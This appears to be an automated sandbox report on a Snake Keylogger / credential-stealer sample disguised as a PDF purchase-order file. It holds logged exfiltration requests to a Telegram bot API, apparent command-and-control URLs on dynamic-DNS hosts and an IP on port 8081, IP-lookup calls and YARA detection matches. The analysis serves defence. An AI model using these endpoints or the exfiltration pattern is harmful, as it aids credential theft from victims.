Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:377142%0D%0ADate%20and%20Time:%2025/10/2024%20/%2018:18:44%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20377142%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:377142%0D%0ADate%20and%20Time:%2025/10/2024%20/%2019:57:31%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20377142%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 25 Oct 2024 07:17:26 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 25 Oct 2024 07:17:30 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000001.00000002.1461711306.0000000004AF4000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000008.00000002.3879338940.0000000000434000.00000040.00000400.00020000.00000000.sdmp, QeSBxb.exe, 00000009.00000002.1498814254.0000000004755000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000001.00000002.1461711306.0000000004AF4000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000008.00000002.3882761665.0000000003191000.00000004.00000800.00020000.00000000.sdmp, QeSBxb.exe, 00000009.00000002.1498814254.0000000004755000.00000004.00000800.00020000.00000000.sdmp, QeSBxb.exe, 0000000D.00000002.3883255353.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, QeSBxb.exe, 0000000D.00000002.3879340417.0000000000430000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000001.00000002.1461711306.0000000004AF4000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000008.00000002.3882761665.0000000003191000.00000004.00000800.00020000.00000000.sdmp, QeSBxb.exe, 00000009.00000002.1498814254.0000000004755000.00000004.00000800.00020000.00000000.sdmp, QeSBxb.exe, 0000000D.00000002.3883255353.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, QeSBxb.exe, 0000000D.00000002.3879340417.0000000000430000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000008.00000002.3882761665.0000000003191000.00000004.00000800.00020000.00000000.sdmp, QeSBxb.exe, 0000000D.00000002.3883255353.0000000002E51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000008.00000002.3882761665.0000000003191000.00000004.00000800.00020000.00000000.sdmp, QeSBxb.exe, 0000000D.00000002.3883255353.0000000002E51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000001.00000002.1461711306.0000000004AF4000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000008.00000002.3879338940.0000000000434000.00000040.00000400.00020000.00000000.sdmp, QeSBxb.exe, 00000009.00000002.1498814254.0000000004755000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, QeSBxb.exe.1.dr	String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, QeSBxb.exe.1.dr	String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, QeSBxb.exe.1.dr	String found in binary or memory: http://ocsp.comodoca.com0
Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000001.00000002.1460284409.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000008.00000002.3882761665.0000000003191000.00000004.00000800.00020000.00000000.sdmp, QeSBxb.exe, 00000009.00000002.1497081679.0000000002F10000.00000004.00000800.00020000.00000000.sdmp, QeSBxb.exe, 0000000D.00000002.3883255353.0000000002E51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000001.00000002.1461711306.0000000004AF4000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000008.00000002.3882761665.0000000003191000.00000004.00000800.00020000.00000000.sdmp, QeSBxb.exe, 00000009.00000002.1498814254.0000000004755000.00000004.00000800.00020000.00000000.sdmp, QeSBxb.exe, 0000000D.00000002.3883255353.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, QeSBxb.exe, 0000000D.00000002.3879340417.0000000000430000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000008.00000002.3890931834.00000000041B1000.00000004.00000800.00020000.00000000.sdmp, QeSBxb.exe, 0000000D.00000002.3892287953.0000000003E73000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000008.00000002.3882761665.0000000003276000.00000004.00000800.00020000.00000000.sdmp, QeSBxb.exe, 0000000D.00000002.3883255353.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000001.00000002.1461711306.0000000004AF4000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000008.00000002.3882761665.0000000003276000.00000004.00000800.00020000.00000000.sdmp, QeSBxb.exe, 00000009.00000002.1498814254.0000000004755000.00000004.00000800.00020000.00000000.sdmp, QeSBxb.exe, 0000000D.00000002.3883255353.0000000002F35000.00000004.00000800.00020000.00000000.sdmp, QeSBxb.exe, 0000000D.00000002.3879340417.0000000000435000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000008.00000002.3882761665.0000000003276000.00000004.00000800.00020000.00000000.sdmp, QeSBxb.exe, 0000000D.00000002.3883255353.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000008.00000002.3882761665.0000000003276000.00000004.00000800.00020000.00000000.sdmp, QeSBxb.exe, 0000000D.00000002.3883255353.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:377142%0D%0ADate%20a
Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000008.00000002.3890931834.00000000041B1000.00000004.00000800.00020000.00000000.sdmp, QeSBxb.exe, 0000000D.00000002.3892287953.0000000003E73000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000008.00000002.3890931834.00000000041B1000.00000004.00000800.00020000.00000000.sdmp, QeSBxb.exe, 0000000D.00000002.3892287953.0000000003E73000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000008.00000002.3890931834.00000000041B1000.00000004.00000800.00020000.00000000.sdmp, QeSBxb.exe, 0000000D.00000002.3892287953.0000000003E73000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: QeSBxb.exe, 0000000D.00000002.3883255353.0000000003011000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000008.00000002.3882761665.000000000334D000.00000004.00000800.00020000.00000000.sdmp, QeSBxb.exe, 0000000D.00000002.3883255353.000000000300C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000008.00000002.3890931834.00000000041B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000008.00000002.3890931834.00000000041B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000008.00000002.3890931834.00000000041B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000008.00000002.3882761665.000000000324E000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000008.00000002.3882761665.00000000031DE000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000008.00000002.3882761665.0000000003276000.00000004.00000800.00020000.00000000.sdmp, QeSBxb.exe, 0000000D.00000002.3883255353.0000000002F0E000.00000004.00000800.00020000.00000000.sdmp, QeSBxb.exe, 0000000D.00000002.3883255353.0000000002E9E000.00000004.00000800.00020000.00000000.sdmp, QeSBxb.exe, 0000000D.00000002.3883255353.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000001.00000002.1461711306.0000000004AF4000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000008.00000002.3879338940.0000000000434000.00000040.00000400.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000008.00000002.3882761665.00000000031DE000.00000004.00000800.00020000.00000000.sdmp, QeSBxb.exe, 00000009.00000002.1498814254.0000000004755000.00000004.00000800.00020000.00000000.sdmp, QeSBxb.exe, 0000000D.00000002.3883255353.0000000002E9E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: QeSBxb.exe, 0000000D.00000002.3883255353.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.81
Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000008.00000002.3882761665.0000000003208000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000008.00000002.3882761665.000000000324E000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000008.00000002.3882761665.0000000003276000.00000004.00000800.00020000.00000000.sdmp, QeSBxb.exe, 0000000D.00000002.3883255353.0000000002F0E000.00000004.00000800.00020000.00000000.sdmp, QeSBxb.exe, 0000000D.00000002.3883255353.0000000002EC8000.00000004.00000800.00020000.00000000.sdmp, QeSBxb.exe, 0000000D.00000002.3883255353.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.81$
Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, QeSBxb.exe.1.dr	String found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000008.00000002.3890931834.00000000041B1000.00000004.00000800.00020000.00000000.sdmp, QeSBxb.exe, 0000000D.00000002.3892287953.0000000003E73000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000008.00000002.3890931834.00000000041B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: QeSBxb.exe, 0000000D.00000002.3883255353.0000000003042000.00000004.00000800.00020000.00000000.sdmp, QeSBxb.exe, 0000000D.00000002.3883255353.0000000003033000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/
Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000008.00000002.3882761665.000000000337E000.00000004.00000800.00020000.00000000.sdmp, QeSBxb.exe, 0000000D.00000002.3883255353.000000000303D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/lB

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49752 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 8.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 9.2.QeSBxb.exe.4828a58.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 9.2.QeSBxb.exe.4828a58.3.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 9.2.QeSBxb.exe.4828a58.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 9.2.QeSBxb.exe.47e5838.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 9.2.QeSBxb.exe.47e5838.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4e27af8.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 9.2.QeSBxb.exe.47e5838.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4e27af8.3.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4e27af8.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 9.2.QeSBxb.exe.4828a58.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 9.2.QeSBxb.exe.4828a58.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4da30d8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4d1e6b8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4d1e6b8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4e27af8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4e27af8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4e27af8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4da30d8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 9.2.QeSBxb.exe.47e5838.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 9.2.QeSBxb.exe.47e5838.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000001.00000002.1461711306.0000000004AF4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000009.00000002.1498814254.0000000004755000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe PID: 1036, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: QeSBxb.exe PID: 6708, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

.NET source code contains very large array initializations

Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, Resources.cs	Large array initialization: : array initializer size 688421
Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, formCarInventory.cs	Large array initialization: formCarInventory: array initializer size 4956

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe

Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Code function: 1_2_08CD6B84 NtQueryInformationProcess,	1_2_08CD6B84
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Code function: 1_2_08CDAB60 NtQueryInformationProcess,	1_2_08CDAB60
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Code function: 9_2_087F6B84 NtQueryInformationProcess,	9_2_087F6B84
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Code function: 9_2_087FAB60 NtQueryInformationProcess,	9_2_087FAB60

Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Code function: 1_2_08CD1980	1_2_08CD1980
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Code function: 1_2_08CD6C29	1_2_08CD6C29
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Code function: 1_2_08CDCEE0	1_2_08CDCEE0
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Code function: 1_2_08CD7EF0	1_2_08CD7EF0
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Code function: 1_2_08CD1218	1_2_08CD1218
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Code function: 1_2_08CD9B40	1_2_08CD9B40
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Code function: 1_2_08CDACE8	1_2_08CDACE8
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Code function: 1_2_08CDCEDB	1_2_08CDCEDB
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Code function: 1_2_08CD9F78	1_2_08CD9F78
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Code function: 1_2_08CDD16B	1_2_08CDD16B
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Code function: 1_2_08CDD170	1_2_08CDD170
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Code function: 1_2_08CDA438	1_2_08CDA438
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Code function: 1_2_091AB7F8	1_2_091AB7F8
